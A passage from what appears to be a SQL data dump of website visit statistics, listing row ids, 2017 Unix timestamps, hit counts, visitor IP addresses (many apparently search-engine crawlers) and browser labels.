),(139816,1501553949,1,1,0,0,'178.154.171.18','other'),(139817,1501554053,1,1,0,0,'213.180.203.25','other'),(139818,1501554285,1,1,0,0,'5.45.207.64','other'),(139819,1501554604,9,9,0,0,'216.244.66.246','other'),(139820,1501554806,1,1,0,0,'213.180.203.21','other'),(139821,1501554878,1,1,0,0,'51.255.65.81','other'),(139822,1501554951,2,2,0,0,'217.182.132.20','other'),(139823,1501555506,1,1,0,0,'51.255.65.88','other'),(139824,1501555731,1,1,0,0,'8.29.198.25','other'),(139825,1501555757,1,1,0,0,'51.255.65.35','other'),(139826,1501556085,1,1,0,0,'107.167.116.98','other'),(139827,1501556173,1,1,0,0,'217.182.132.148','other'),(139828,1501556190,1,1,0,0,'164.132.162.164','other'),(139829,1501556291,1,1,0,0,'213.180.203.25','other'),(139830,1501556360,1,1,0,0,'178.154.171.45','other'),(139831,1501556598,1,1,0,0,'213.180.203.32','other'),(139832,1501557047,1,1,0,0,'178.154.171.53','other'),(139833,1501557241,1,1,0,0,'178.154.171.59','other'),(139834,1501557561,1,1,0,0,'5.45.207.66','other'),(139835,1501557787,1,1,0,0,'95.108.181.69','other'),(139836,1501557801,1,1,0,0,'51.255.71.100','other'),(139837,1501557869,1,1,0,0,'37.9.113.94','other'),(139838,1501557969,1,1,0,0,'37.9.113.138','other'),(139839,1501558069,1,1,0,0,'178.154.171.18','other'),(139840,1501558184,1,1,0,0,'51.255.65.37','other'),(139841,1501558274,1,0,1,0,'66.249.76.108',''),(139842,1501558295,1,1,0,0,'51.255.71.112','other'),(139843,1501558296,1,1,0,0,'217.182.132.88','other'),(139844,1501558327,1,1,0,0,'66.249.66.156','chrome'),(139845,1501558337,1,1,0,0,'51.255.65.25','other'),(139846,1501558885,1,1,0,0,'178.154.171.42','other'),(139847,1501559024,1,1,0,0,'137.74.207.170','other'),(139848,1501559480,1,1,0,0,'195.154.168.130','chrome'),(139849,1501559598,1,1,0,0,'95.108.181.52','other'),(139850,1501559752,1,1,0,0,'207.46.13.109','other'),(139851,1501559874,1,1,0,0,'217.69.133.6','other'),(139852,1501559903,1,1,0,0,'5.45.207.56','other'),(139853,1501560004,1,1,0,0,'178.154.171.18','other'),(139854,1501560056,1,1,0,0,'217.182.132.30','other'),(139855,1501560476,1,1,0,0,'51.255.65.57','other'),(139856,1501560697,1,1,0,0,'5.45.207.64','other'),(139857,1501560777,1,1,0,0,'217.182.132.71','other'),(139858,1501560920,1,1,0,0,'51.255.65.28','other'),(139859,1501561156,1,1,0,0,'178.154.171.45','other'),(139860,1501561777,1,1,0,0,'217.182.132.185','other'),(139861,1501561857,1,1,0,0,'164.132.164.180','other'),(139862,1501562029,1,1,0,0,'178.154.171.3','other'),(139863,1501562422,1,1,0,0,'91.196.178.66','firefox'),(139864,1501562872,1,1,0,0,'213.180.203.18','other'),(139865,1501562920,1,1,0,0,'178.154.171.53','other'),(139866,1501563309,1,1,0,0,'217.69.133.2','other'),(139867,1501563777,1,1,0,0,'66.249.76.107','chrome'),(139868,1501563801,1,0,1,0,'66.249.76.109',''),(139869,1501563861,1,1,0,0,'213.180.203.21','other'),(139870,1501564272,1,1,0,0,'5.45.207.64','other'),(139871,1501564340,1,1,0,0,'178.154.171.53','other'),(139872,1501564496,1,1,0,0,'5.45.207.57','other'),(139873,1501565126,1,1,0,0,'213.180.203.14','other'),(139874,1501565306,1,1,0,0,'216.244.66.194','other'),(139875,1501565456,1,1,0,0,'95.108.181.63','other'),(139876,1501565613,1,1,0,0,'216.244.66.246','other'),(139877,1501565730,1,1,0,0,'51.255.65.70','other'),(139878,1501565865,1,1,0,0,'137.74.207.170','other'),(139879,1501566170,1,1,0,0,'217.182.132.146','other'),(139880,1501566306,1,0,1,0,'66.249.66.74',''),(139881,1501566314,1,1,0,0,'66.249.76.91','chrome'),(139882,1501566555,1,1,0,0,'8.29.198.26','other'),(139883,1501566670,6,6,0,0,'216.244.66.246','other'),(139884,1501566737,1,1,0,0,'37.73.224.148','chrome'),(139885,1501566807,1,1,0,0,'217.182.132.154','other'),(139886,1501567546,1,1,0,0,'5.45.207.64','other'),(139887,1501567619,1,1,0,0,'217.182.132.188','other'),(139888,1501568406,6,6,0,0,'216.244.66.194','other'),(139889,1501568607,1,1,0,0,'66.249.76.107','chrome'),(139890,1501568923,1,1,0,0,'217.69.133.5','other'),(139891,1501568954,1,1,0,0,'180.76.15.27','other'),(139892,1501569138,1,1,0,0,'178.154.171.59','other'),(139893,1501569832,1,1,0,0,'66.249.76.108','chrome'),(139894,1501569865,1,1,0,0,'91.196.178.67','chrome'),(139895,1501570246,1,0,1,0,'66.249.76.107',''),(139896,1501570531,1,1,0,0,'213.180.203.21','other'),(139897,1501570741,1,1,0,0,'95.108.181.63','other'),(139898,1501571161,1,1,0,0,'217.182.132.187','other'),(139899,1501571384,1,1,0,0,'193.34.173.189','chrome'),(139900,1501571533,1,1,0,0,'46.211.136.180','chrome'),(139901,1501571657,1,0,1,0,'66.249.66.157',''),(139902,1501571843,1,1,0,0,'91.196.178.67','firefox'),(139903,1501572096,1,1,0,0,'217.182.132.176','other'),(139904,1501572296,1,1,0,0,'51.255.65.42','other'),(139905,1501572332,1,1,0,0,'217.182.132.16','other'),(139906,1501572482,1,1,0,0,'95.108.181.57','other'),(139907,1501572583,1,1,0,0,'91.196.178.70','firefox'),(139908,1501572713,1,1,0,0,'217.182.132.86','other'),(139909,1501572794,1,1,0,0,'207.46.13.173','other'),(139910,1501572806,1,1,0,0,'157.55.39.153','other'),(139911,1501573311,1,1,0,0,'213.180.203.42','other'),(139912,1501573567,1,1,0,0,'51.255.65.11','other'),(139913,1501573596,1,1,0,0,'51.255.65.62','other'),(139914,1501573993,1,1,0,0,'217.182.132.23','other'),(139915,1501574033,1,1,0,0,'216.244.66.246','other'),(139916,1501574046,1,1,0,0,'51.255.65.79','other'),(139917,1501574410,1,1,0,0,'217.182.132.65','other'),(139918,1501574671,1,0,1,0,'66.249.66.156',''),(139919,1501574869,1,1,0,0,'217.182.132.24','other'),(139920,1501575723,1,1,0,0,'164.132.162.160','other'),(139921,1501575819,1,1,0,0,'51.255.65.94','other'),(139922,1501575845,1,1,0,0,'176.31.231.10','other'),(139923,1501576073,1,1,0,0,'217.182.132.54','other'),(139924,1501576096,1,1,0,0,'91.196.178.165','chrome'),(139925,1501576113,1,1,0,0,'217.182.132.191','other'),(139926,1501576148,7,7,0,0,'216.244.66.246','other'),(139927,1501576566,1,1,0,0,'51.255.65.34','other'),(139928,1501576891,1,1,0,0,'217.69.133.5','other'),(139929,1501576902,1,1,0,0,'51.255.71.125','other'),(139930,1501577389,1,1,0,0,'8.29.198.25','other'),(139931,1501577838,1,1,0,0,'95.108.181.52','other'),(139932,1501577842,1,1,0,0,'91.196.178.70','chrome'),(139933,1501578383,3,3,0,0,'216.244.66.194','other'),(139934,1501578681,2,2,0,0,'91.196.178.67','chrome'),(139935,1501578726,1,1,0,0,'107.21.1.8','other'),(139936,1501578772,1,1,0,0,'195.154.168.130','chrome'),(139937,1501578827,5,5,0,0,'216.244.66.246','other'),(139938,1501579004,1,1,0,0,'5.45.207.57','other'),(139939,1501579242,1,1,0,0,'37.9.113.78','other'),(139940,1501580251,1,1,0,0,'46.200.56.17','chrome'),(139941,1501580256,1,1,0,0,'46.161.9.39','chrome'),(139942,1501580273,3,3,0,0,'216.244.66.194','other'),(139943,1501580283,1,1,0,0,'5.45.207.83','other'),(139944,1501580316,1,1,0,0,'37.73.217.240','chrome'),(139945,1501580518,1,1,0,0,'91.196.178.67','chrome'),(139946,1501580582,1,1,0,0,'213.180.203.42','other'),(139947,1501582530,1,1,0,0,'51.255.65.37','other'),(139948,1501582550,1,1,0,0,'95.108.181.57','other'),(139949,1501582572,1,1,0,0,'217.69.133.9','other'),(139950,1501582869,1,1,0,0,'91.196.178.66','firefox'),(139951,1501583166,1,1,0,0,'217.182.132.95','other'),(139952,1501583211,1,1,0,0,'213.180.203.32','other'),(139953,1501583272,1,1,0,0,'178.154.171.59','other'),(139954,1501583558,1,1,0,0,'37.9.113.128','other'),(139955,1501583639,1,1,0,0,'217.182.132.54','other'),(139956,1501584004,1,1,0,0,'5.45.207.66','other'),(139957,1501584124,1,1,0,0,'178.154.171.53','other'),(139958,1501584273,1,1,0,0,'78.152.161.14','chrome'),(139959,1501585626,3,3,0,0,'216.244.66.194','other'),(139960,1501585788,1,1,0,0,'5.45.207.83','other'),(139961,1501586785,2,2,0,0,'216.244.66.246','other'),(139962,1501587093,1,1,0,0,'95.132.27.53','firefox'),(139963,1501587285,1,1,0,0,'91.196.178.67','chrome'),(139964,1501587366,2,2,0,0,'37.53.137.203','chrome'),(139965,1501587447,1,1,0,0,'82.207.49.138','firefox'),(139966,1501587560,1,1,0,0,'5.45.207.57','other'),(139967,1501587668,1,1,0,0,'51.255.65.79','other'),(139968,1501588224,1,1,0,0,'8.29.198.25','other'),(139969,1501588327,1,1,0,0,'178.154.171.59','other'),(139970,1501588358,1,1,0,0,'213.180.203.42','other'),(139971,1501588537,1,1,0,0,'178.154.171.3','other'),(139972,1501588587,1,1,0,0,'178.154.171.53','other'),(139973,1501588596,1,1,0,0,'51.255.65.93','other'),(139974,1501588676,1,0,1,0,'66.249.76.107',''),(139975,1501588724,1,1,0,0,'51.255.65.66','other'),(139976,1501588829,1,1,0,0,'77.37.242.29','chrome'),(139977,1501588915,1,1,0,0,'66.102.9.27','chrome'),(139978,1501589027,1,1,0,0,'91.196.178.102','chrome'),(139979,1501589148,2,2,0,0,'216.244.66.246','other'),(139980,1501589521,1,1,0,0,'217.182.132.170','other'),(139981,1501589572,1,1,0,0,'95.108.181.52','other'),(139982,1501589748,9,9,0,0,'216.244.66.194','other'),(139983,1501590329,1,1,0,0,'91.196.178.67','chrome'),(139984,1501591014,1,1,0,0,'5.45.207.83','other'),(139985,1501591060,1,1,0,0,'66.249.66.155','chrome'),(139986,1501591355,1,0,1,0,'66.249.76.109',''),(139987,1501591638,1,1,0,0,'92.112.35.220','chrome'),(139988,1501592112,1,1,0,0,'213.180.203.32','other'),(139989,1501592143,1,1,0,0,'95.108.181.60','other'),(139990,1501592292,1,1,0,0,'51.255.65.67','other'),(139991,1501592804,1,1,0,0,'51.255.65.13','other'),(139992,1501593172,1,1,0,0,'37.9.113.138','other'),(139993,1501593200,1,1,0,0,'5.228.111.111','msie'),(139994,1501593202,1,1,0,0,'5.35.58.221','msie'),(139995,1501593716,1,1,0,0,'95.108.181.69','other'),(139996,1501593739,1,1,0,0,'178.154.171.42','other'),(139997,1501593812,1,1,0,0,'217.182.132.185','other'),(139998,1501593969,1,1,0,0,'51.255.65.46','other'),(139999,1501593974,1,1,0,0,'91.196.178.67','chrome'),(140000,1501594030,1,1,0,0,'94.178.137.108','chrome'),(140001,1501594065,1,1,0,0,'95.108.181.58','other'),(140002,1501594093,1,1,0,0,'51.255.71.116','other'),(140003,1501594264,1,1,0,0,'66.249.76.107','chrome'),(140004,1501594455,1,1,0,0,'199.16.157.181','other'),(140005,1501594666,1,1,0,0,'91.124.63.10','firefox'),(140006,1501594797,3,3,0,0,'216.244.66.194','other'),(140007,1501594888,1,1,0,0,'37.9.113.94','other'),(140008,1501595078,1,1,0,0,'164.132.162.156','other'),(140009,1501595122,1,1,0,0,'51.255.65.29','other'),(140010,1501595765,1,1,0,0,'46.201.175.91','firefox'),(140011,1501595827,1,1,0,0,'51.255.65.65','other'),(140012,1501596013,1,1,0,0,'217.182.132.97','other'),(140013,1501596187,1,1,0,0,'91.196.178.70','firefox'),(140014,1501596199,1,1,0,0,'178.154.171.18','other'),(140015,1501596421,5,5,0,0,'216.244.66.246','other'),(140016,1501596648,1,1,0,0,'51.255.64.106','other'),(140017,1501596679,1,1,0,0,'91.196.178.40','chrome'),(140018,1501596693,1,1,0,0,'151.80.27.118','other'),(140019,1501596966,1,0,1,0,'66.249.76.108',''),(140020,1501597034,1,1,0,0,'66.249.76.89','chrome'),(140021,1501597040,1,1,0,0,'217.182.132.95','other'),(140022,1501597115,1,1,0,0,'217.182.132.193','other'),(140023,1501597270,1,1,0,0,'91.196.178.161','chrome'),(140024,1501597302,2,2,0,0,'213.180.203.42','other'),(140025,1501597351,1,1,0,0,'213.180.203.14','other'),(140026,1501597359,1,1,0,0,'213.180.203.25','other'),(140027,1501597603,1,1,0,0,'95.108.181.63','other'),(140028,1501597674,1,0,1,0,'66.249.76.107',''),(140029,1501597705,1,1,0,0,'91.196.178.66','firefox'),(140030,1501598051,1,1,0,0,'178.154.171.59','other'),(140031,1501598074,1,0,1,0,'66.249.76.109',''),(140032,1501598667,1,1,0,0,'178.154.171.18','other'),(140033,1501598723,1,1,0,0,'95.108.181.52','other'),(140034,1501598770,1,0,1,0,'66.249.66.157',''),(140035,1501598853,1,1,0,0,'137.74.207.114','other'),(140036,1501598942,1,1,0,0,'51.255.65.97','other'),(140037,1501599055,1,1,0,0,'8.29.198.25','other'),(140038,1501599219,1,1,0,0,'95.108.181.69','other'),(140039,1501599348,5,5,0,0,'216.244.66.246','other'),(140040,1501599630,1,1,0,0,'51.255.65.82','other'),(140041,1501599665,3,3,0,0,'216.244.66.194','other'),(140042,1501599867,1,1,0,0,'91.196.178.40','chrome'),(140043,1501599994,1,1,0,0,'5.45.207.83','other'),(140044,1501600207,1,1,0,0,'137.74.207.108','other'),(140045,1501600279,1,0,1,0,'66.249.66.74',''),(140046,1501600290,1,1,0,0,'66.249.76.91','chrome'),(140047,1501600308,1,1,0,0,'217.182.132.192','other'),(140048,1501600402,1,1,0,0,'91.196.178.65','firefox'),(140049,1501600491,1,1,0,0,'5.45.207.66','other'),(140050,1501600930,1,1,0,0,'217.182.132.177','other'),(140051,1501601004,1,1,0,0,'217.182.132.36','other'),(140052,1501601020,1,1,0,0,'95.108.181.52','other'),(140053,1501601432,1,1,0,0,'207.46.13.109','other'),(140054,1501601859,1,1,0,0,'37.9.113.138','other'),(140055,1501602294,1,1,0,0,'5.45.207.66','other'),(140056,1501602344,1,1,0,0,'157.55.39.153','other'),(140057,1501602454,1,0,1,0,'66.249.66.155',''),(140058,1501602464,1,1,0,0,'66.249.76.107','chrome'),(140059,1501602756,1,1,0,0,'90.174.3.16','chrome'),(140060,1501603227,1,1,0,0,'217.182.132.32','other'),(140061,1501603352,1,1,0,0,'51.255.71.114','other'),(140062,1501603393,1,1,0,0,'5.45.207.83','other'),(140063,1501603462,1,1,0,0,'213.180.203.21','other'),(140064,1501603633,1,1,0,0,'66.249.66.76','chrome'),(140065,1501603818,1,1,0,0,'217.182.132.90','other'),(140066,1501603973,1,0,1,0,'66.249.66.156',''),(140067,1501604017,1,1,0,0,'51.255.65.57','other'),(140068,1501604040,1,1,0,0,'217.182.132.67','other'),(140069,1501604721,1,1,0,0,'51.255.65.12','other'),(140070,1501605218,1,1,0,0,'37.9.113.94','other'),(140071,1501605231,1,1,0,0,'216.244.66.246','other'),(140072,1501605322,1,1,0,0,'178.154.171.42','other'),(140073,1501605590,1,1,0,0,'51.255.71.130','other'),(140074,1501605608,1,1,0,0,'195.154.168.130','chrome'),(140075,1501605920,2,2,0,0,'213.180.203.43','other'),(140076,1501605965,1,1,0,0,'5.45.207.56','other'),(140077,1501605994,1,1,0,0,'217.182.132.7','other'),(140078,1501606046,1,1,0,0,'217.182.132.60','other'),(140079,1501606450,4,4,0,0,'216.244.66.194','other'),(140080,1501606621,1,1,0,0,'5.45.207.57','other'),(140081,1501606904,1,1,0,0,'51.255.65.70','other'),(140082,1501606964,1,1,0,0,'37.9.113.94','other'),(140083,1501607178,1,1,0,0,'66.249.66.156','chrome'),(140084,1501607210,1,1,0,0,'217.182.132.79','other'),(140085,1501607370,1,1,0,0,'217.182.132.91','other'),(140086,1501607606,1,1,0,0,'37.54.18.204','chrome'),(140087,1501607654,4,4,0,0,'216.244.66.246','other'),(140088,1501607929,1,1,0,0,'178.154.171.18','other'),(140089,1501608505,1,1,0,0,'178.154.171.45','other'),(140090,1501608670,1,1,0,0,'164.132.164.180','other'),(140091,1501608691,1,1,0,0,'66.249.66.155','chrome'),(140092,1501608715,2,1,1,0,'66.249.66.156',''),(140093,1501608946,1,1,0,0,'51.255.65.76','other'),(140094,1501609405,1,1,0,0,'51.255.65.86','other'),(140095,1501609481,1,1,0,0,'95.108.181.58','other'),(140096,1501609546,1,1,0,0,'213.180.203.25','other'),(140097,1501609555,3,3,0,0,'216.244.66.246','other'),(140098,1501609581,1,1,0,0,'207.46.13.109','other'),(140099,1501609623,1,1,0,0,'164.132.162.154','other'),(140100,1501609900,1,1,0,0,'8.29.198.25','other'),(140101,1501610061,1,1,0,0,'212.90.60.83','firefox'),(140102,1501610265,1,1,0,0,'217.182.132.14','other'),(140103,1501610357,1,0,1,0,'66.249.66.155',''),(140104,1501610455,1,1,0,0,'51.255.65.70','other'),(140105,1501610952,1,1,0,0,'95.108.181.60','other'),(140106,1501611075,1,1,0,0,'94.178.7.82','chrome'),(140107,1501611307,5,5,0,0,'216.244.66.194','other'),(140108,1501611878,1,1,0,0,'217.182.132.28','other'),(140109,1501612047,1,0,1,0,'66.249.66.157',''),(140110,1501612199,1,1,0,0,'217.182.132.74','other'),(140111,1501612381,1,1,0,0,'217.182.132.176','other'),(140112,1501612431,1,1,0,0,'213.180.203.18','other'),(140113,1501612906,1,1,0,0,'217.182.132.54','other'),(140114,1501613111,1,1,0,0,'130.180.216.112','firefox'),(140115,1501613126,1,1,0,0,'178.154.171.42','other'),(140116,1501613179,1,1,0,0,'51.255.65.13','other'),(140117,1501613591,1,1,0,0,'178.154.171.72','other'),(140118,1501613679,1,1,0,0,'95.108.181.60','other'),(140119,1501613975,1,1,0,0,'213.180.203.32','other'),(140120,1501614446,1,1,0,0,'95.108.181.57','other'),(140121,1501614550,1,1,0,0,'51.255.71.120','other'),(140122,1501615004,1,1,0,0,'217.182.132.174','other'),(140123,1501615010,1,1,0,0,'213.180.203.42','other'),(140124,1501615582,1,1,0,0,'217.182.132.16','other'),(140125,1501616007,1,1,0,0,'37.9.113.94','other'),(140126,1501616215,1,1,0,0,'51.255.65.58','other'),(140127,1501616276,1,1,0,0,'207.46.13.109','other'),(140128,1501617081,1,1,0,0,'37.9.113.138','other'),(140129,1501617305,1,1,0,0,'54.165.59.7','other'),(140130,1501617428,1,1,0,0,'95.108.181.58','other'),(140131,1501617467,1,1,0,0,'51.255.71.110','other'),(140132,1501617609,1,1,0,0,'51.255.65.74','other'),(140133,1501618140,1,1,0,0,'51.255.65.15','other'),(140134,1501618326,1,1,0,0,'217.182.132.67','other'),(140135,1501618621,2,2,0,0,'216.244.66.246','other'),(140136,1501619018,1,1,0,0,'51.255.65.24','other'),(140137,1501619534,1,1,0,0,'91.196.178.34','chrome'),(140138,1501619689,1,1,0,0,'217.182.132.78','other'),(140139,1501619735,1,1,0,0,'95.108.181.63','other'),(140140,1501619897,1,1,0,0,'95.108.181.57','other'),(140141,1501619999,1,1,0,0,'51.255.65.91','other'),(140142,1501620314,1,1,0,0,'5.45.207.57','other'),(140143,1501620343,1,1,0,0,'51.255.65.73','other'),(140144,1501620746,1,1,0,0,'8.29.198.27','other'),(140145,1501620866,1,1,0,0,'51.255.65.9','other'),(140146,1501621119,1,1,0,0,'213.180.203.18','other'),(140147,1501621129,5,5,0,0,'216.244.66.246','other'),(140148,1501621174,1,1,0,0,'46.50.129.43','chrome'),(140149,1501621216,1,1,0,0,'178.154.171.53','other'),(140150,1501621351,1,1,0,0,'51.255.71.101','other'),(140151,1501621381,1,1,0,0,'217.182.132.92','other'),(140152,1501621575,1,1,0,0,'51.255.65.86','other'),(140153,1501621790,1,0,1,0,'66.249.66.74',''),(140154,1501621848,1,1,0,0,'217.69.133.3','other'),(140155,1501622656,1,1,0,0,'95.108.181.63','other'),(140156,1501622820,1,1,0,0,'201.18.18.173','firefox'),(140157,1501622856,1,1,0,0,'217.182.132.174','other'),(140158,1501622949,1,1,0,0,'217.182.132.170','other'),(140159,1501623775,1,1,0,0,'51.255.65.44','other'),(140160,1501624436,1,1,0,0,'217.182.132.193','other'),(140161,1501624689,1,1,0,0,'195.154.168.130','chrome'),(140162,1501625037,1,1,0,0,'217.182.132.65','other'),(140163,1501625064,1,1,0,0,'178.154.171.18','other'),(140164,1501626230,1,1,0,0,'66.249.66.155','chrome'),(140165,1501626459,1,1,0,0,'217.182.132.76','other'),(140166,1501626482,4,4,0,0,'216.244.66.194','other'),(140167,1501626544,1,1,0,0,'213.180.203.21','other'),(140168,1501626643,1,1,0,0,'164.132.162.188','other'),(140169,1501626980,1,1,0,0,'5.45.207.64','other'),(140170,1501627091,1,1,0,0,'164.132.162.154','other'),(140171,1501627696,1,1,0,0,'213.180.203.21','other'),(140172,1501627790,1,1,0,0,'95.108.181.52','other'),(140173,1501628189,1,1,0,0,'178.154.171.53','other'),(140174,1501628325,1,1,0,0,'37.9.113.138','other'),(140175,1501628329,1,1,0,0,'37.9.113.128','other'),(140176,1501628363,6,6,0,0,'216.244.66.246','other'),(140177,1501629400,1,1,0,0,'207.46.13.109','other'),(140178,1501629530,3,3,0,0,'213.180.203.25','other'),(140179,1501629716,1,1,0,0,'37.115.109.129','chrome'),(140180,1501630601,1,1,0,0,'5.45.207.64','other'),(140181,1501630788,1,1,0,0,'37.9.113.78','other'),(140182,1501631507,1,1,0,0,'46.161.9.39','other'),(140183,1501631580,1,1,0,0,'8.29.198.27','other'),(140184,1501631710,1,0,1,0,'66.249.66.155',''),(140185,1501632489,1,1,0,0,'66.249.66.157','chrome'),(140186,1501632513,1,0,1,0,'66.249.66.76',''),(140187,1501632872,1,1,0,0,'178.154.171.45','other'),(140188,1501633702,4,4,0,0,'216.244.66.194','other'),(140189,1501633730,1,1,0,0,'178.154.171.53','other'),(140190,1501633996,1,1,0,0,'37.9.113.94','other'),(140191,1501634585,1,1,0,0,'178.154.171.59','other'),(140192,1501635558,1,1,0,0,'37.9.113.66','other'),(140193,1501635904,1,1,0,0,'66.249.66.157','chrome'),(140194,1501636278,1,1,0,0,'178.154.171.59','other'),(140195,1501636678,1,0,1,0,'66.249.66.76',''),(140196,1501636916,2,0,2,0,'66.249.66.157',''),(140197,1501637047,1,1,0,0,'66.249.66.156','chrome'),(140198,1501638025,1,1,0,0,'37.9.113.138','other'),(140199,1501638984,1,1,0,0,'157.55.39.45','other'),(140200,1501639165,1,1,0,0,'178.154.171.42','other'),(140201,1501639686,6,6,0,0,'216.244.66.246','other'),(140202,1501640176,1,1,0,0,'66.249.66.156','chrome'),(140203,1501640620,1,1,0,0,'5.45.207.66','other'),(140204,1501641752,1,1,0,0,'213.180.203.14','other'),(140205,1501642243,1,0,1,0,'66.249.66.74',''),(140206,1501642405,1,1,0,0,'8.29.198.27','other'),(140207,1501643326,1,0,1,0,'68.180.229.59',''),(140208,1501644034,1,1,0,0,'51.255.65.75','other'),(140209,1501644061,1,1,0,0,'217.69.133.194','other'),(140210,1501644586,1,1,0,0,'91.209.11.236','other'),(140211,1501644856,1,1,0,0,'51.255.65.85','other'),(140212,1501644991,1,1,0,0,'164.132.162.188','other'),(140213,1501645033,1,1,0,0,'37.9.113.128','other'),(140214,1501645984,1,1,0,0,'213.180.203.18','other'),(140215,1501646085,1,1,0,0,'217.182.132.63','other'),(140216,1501646554,2,2,0,0,'95.108.181.58','other'),(140217,1501646909,1,1,0,0,'213.180.203.32','other'),(140218,1501647062,1,1,0,0,'46.211.200.186','chrome'),(140219,1501647402,1,1,0,0,'180.76.15.163','other'),(140220,1501647473,1,1,0,0,'217.69.133.3','other'),(140221,1501647492,1,1,0,0,'51.255.65.95','other'),(140222,1501647668,1,1,0,0,'137.74.207.170','other'),(140223,1501647702,1,1,0,0,'37.9.113.66','other'),(140224,1501648123,1,1,0,0,'37.9.113.128','other'),(140225,1501648310,1,1,0,0,'51.255.65.90','other'),(140226,1501648514,1,1,0,0,'217.182.132.24','other'),(140227,1501648519,1,1,0,0,'217.182.132.29','other'),(140228,1501648556,1,1,0,0,'137.74.207.164','other'),(140229,1501648853,1,1,0,0,'91.209.11.236','other'),(140230,1501648958,1,1,0,0,'37.9.113.78','other'),(140231,1501649142,1,1,0,0,'91.196.178.67','firefox'),(140232,1501649381,1,1,0,0,'51.255.65.31','other'),(140233,1501649745,1,1,0,0,'37.9.113.138','other'),(140234,1501649980,1,1,0,0,'51.255.65.61','other'),(140235,1501650160,1,1,0,0,'207.46.13.109','other'),(140236,1501650184,1,1,0,0,'137.74.207.114','other'),(140237,1501650194,5,5,0,0,'216.244.66.246','other'),(140238,1501650909,5,5,0,0,'216.244.66.194','other'),(140239,1501651186,1,1,0,0,'178.154.171.59','other'),(140240,1501651229,1,1,0,0,'51.255.65.67','other'),(140241,1501651338,2,2,0,0,'95.108.181.69','other'),(140242,1501651391,1,1,0,0,'95.108.181.52','other'),(140243,1501651485,3,3,0,0,'216.244.66.246','other'),(140244,1501651495,2,2,0,0,'66.249.66.74','chrome'),(140245,1501651511,1,1,0,0,'66.249.66.157','chrome'),(140246,1501651890,1,1,0,0,'217.182.132.65','other'),(140247,1501652085,1,1,0,0,'216.244.66.194','other'),(140248,1501652173,1,1,0,0,'91.196.178.67','chrome'),(140249,1501652292,1,1,0,0,'95.108.181.69','other'),(140250,1501653146,1,1,0,0,'51.255.65.73','other'),(140251,1501653166,1,1,0,0,'5.45.207.66','other'),(140252,1501653237,1,1,0,0,'8.29.198.27','other'),(140253,1501653396,1,1,0,0,'217.182.132.151','other'),(140254,1501653405,1,0,1,0,'66.249.66.157',''),(140255,1501653704,1,1,0,0,'51.255.71.100','other'),(140256,1501654186,1,1,0,0,'91.196.178.67','chrome'),(140257,1501654384,1,0,1,0,'66.249.66.155',''),(140258,1501654449,1,1,0,0,'91.196.178.166','chrome'),(140259,1501654987,1,1,0,0,'51.255.65.16','other'),(140260,1501655169,1,1,0,0,'37.9.113.138','other'),(140261,1501655201,1,1,0,0,'217.69.133.6','other'),(140262,1501655615,1,1,0,0,'37.9.113.78','other'),(140263,1501655645,1,1,0,0,'91.196.178.166','chrome'),(140264,1501655860,1,1,0,0,'37.53.244.71','msie'),(140265,1501655904,1,1,0,0,'51.255.65.89','other'),(140266,1501656145,1,1,0,0,'82.207.124.250','firefox'),(140267,1501656258,1,1,0,0,'37.52.245.143','chrome'),(140268,1501656448,1,1,0,0,'51.255.65.81','other'),(140269,1501656601,2,2,0,0,'216.244.66.194','other'),(140270,1501656877,1,1,0,0,'178.154.171.18','other'),(140271,1501656898,2,2,0,0,'51.255.65.63','other'),(140272,1501657289,1,1,0,0,'5.45.207.64','other'),(140273,1501657978,1,1,0,0,'91.209.11.236','other'),(140274,1501657999,2,2,0,0,'178.154.171.45','other'),(140275,1501658052,1,1,0,0,'51.255.65.57','other'),(140276,1501658308,1,1,0,0,'213.180.203.32','other'),(140277,1501658613,3,3,0,0,'216.244.66.246','other'),(140278,1501658620,1,1,0,0,'51.255.71.128','other'),(140279,1501658630,1,1,0,0,'217.69.133.4','other'),(140280,1501659244,1,1,0,0,'157.55.39.29','other'),(140281,1501659835,1,1,0,0,'217.182.132.171','other'),(140282,1501660321,1,1,0,0,'213.180.203.18','other'),(140283,1501660866,1,1,0,0,'91.196.178.164','chrome'),(140284,1501660979,4,4,0,0,'216.244.66.194','other'),(140285,1501661572,1,1,0,0,'91.209.11.236','other'),(140286,1501661599,1,0,1,0,'68.180.229.59',''),(140287,1501661674,1,1,0,0,'178.154.171.59','other'),(140288,1501661950,1,1,0,0,'178.154.171.42','other'),(140289,1501662046,1,1,0,0,'5.45.207.83','other'),(140290,1501662079,4,4,0,0,'216.244.66.246','other'),(140291,1501662117,1,1,0,0,'51.255.65.58','other'),(140292,1501662216,1,1,0,0,'217.69.133.4','other'),(140293,1501662316,1,1,0,0,'91.196.178.71','chrome'),(140294,1501662320,1,1,0,0,'188.226.220.27','chrome'),(140295,1501662562,1,1,0,0,'91.196.178.67','chrome'),(140296,1501662619,1,1,0,0,'213.180.203.21','other'),(140297,1501662778,1,1,0,0,'213.180.203.32','other'),(140298,1501662816,1,1,0,0,'217.182.132.186','other'),(140299,1501662981,1,1,0,0,'213.180.203.14','other'),(140300,1501663303,1,1,0,0,'178.154.171.18','other'),(140301,1501663546,1,1,0,0,'66.249.66.155','chrome'),(140302,1501663563,1,1,0,0,'91.196.178.71','chrome'),(140303,1501663568,1,1,0,0,'178.154.171.53','other'),(140304,1501663908,1,1,0,0,'51.255.65.16','other'),(140305,1501663924,1,1,0,0,'213.180.203.21','other'),(140306,1501664075,1,1,0,0,'8.29.198.25','other'),(140307,1501664461,5,5,0,0,'216.244.66.194','other'),(140308,1501664465,1,1,0,0,'188.166.78.194','chrome'),(140309,1501664467,1,1,0,0,'51.255.71.125','other'),(140310,1501664524,1,1,0,0,'5.45.207.66','other'),(140311,1501664548,1,1,0,0,'213.180.203.14','other'),(140312,1501664582,1,1,0,0,'178.154.171.45','other'),(140313,1501664756,1,1,0,0,'91.196.178.67','chrome'),(140314,1501664947,1,1,0,0,'213.180.203.42','other'),(140315,1501665399,1,1,0,0,'51.255.65.48','other'),(140316,1501665752,1,1,0,0,'91.196.178.71','chrome'),(140317,1501666050,1,1,0,0,'217.182.132.14','other'),(140318,1501666632,1,1,0,0,'46.161.9.39','firefox'),(140319,1501666749,1,1,0,0,'91.196.178.71','chrome'),(140320,1501666814,1,1,0,0,'66.249.66.157','chrome'),(140321,1501666924,1,1,0,0,'66.249.66.156','chrome'),(140322,1501667091,1,1,0,0,'51.255.65.6','other'),(140323,1501667097,1,1,0,0,'95.108.181.60','other'),(140324,1501667313,1,1,0,0,'157.55.39.29','other'),(140325,1501667516,1,1,0,0,'178.92.208.146','chrome'),(140326,1501667605,1,1,0,0,'91.196.178.67','chrome'),(140327,1501667673,1,1,0,0,'217.182.13